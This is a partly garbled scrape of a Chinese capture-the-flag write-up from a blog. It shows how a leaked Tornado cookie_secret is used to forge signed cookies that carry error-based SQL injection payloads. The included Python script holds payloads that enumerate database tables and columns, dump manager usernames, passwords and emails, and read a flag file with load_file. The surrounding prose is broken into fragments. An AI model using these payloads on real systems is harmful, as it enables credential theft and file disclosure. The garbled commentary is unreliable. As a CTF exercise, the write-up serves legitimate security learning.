dalaowppasspass[]=
爆出一条文件路径
直接访问试试
什么鬼。。。。看来没什么东西
rtiny
github
xss
py
lock.pysql
usernameself.get_secure_cookieself.get_secure_cookie函数的
index.pycookie
cookie_secret
# coding:utf-8 import tornado.ioloop import tornado.web # @author: V0W # @reference: https://blog.csdn.net/include_heqile/article/details/82591707 settings = { "cookie_secret" : "M0ehO260Qm2dD/MQFYfczYpUbJoyrkp6qYoI2hRw2jc=", } class MainHandler(tornado.web.RequestHandler): def get(self): self.write("Hello") #self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,(select version()))) -- ") #self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,(select group_concat(distinct table_name) from information_schema.tables where table_schema=database())))-- ") #self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,(select group_concat(distinct column_name) from information_schema.columns where table_schema=database() and table_name='manager')))-- ") #self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,mid((select group_concat(username,'|',password,'|',email) from manager),30,62))) -- ") #self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,(select load_file('/var/www/html/f13g_ls_here.txt'))))#") self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,mid((select load_file('/var/www/html/f13g_ls_here.txt')),28,60)))#") self.write(self.get_secure_cookie("username")) def make_app(): return tornado.web.Application([ (r"/index", MainHandler), ], **settings) if __name__ == "__main__": app = make_app() app.listen(8089) tornado.ioloop.IOLoop.instance().start()
pypytornado.ioloop,安装指令python -m pip install tornadopypy127.0.0.1:8089/index(8089)
cookieusernamecookie_secret
bpusernamepasswordxssflagf13g_ls_here.txt5flagflag
来源:博客园
作者:七星易
链接:https://www.cnblogs.com/wosun/p/11675151.html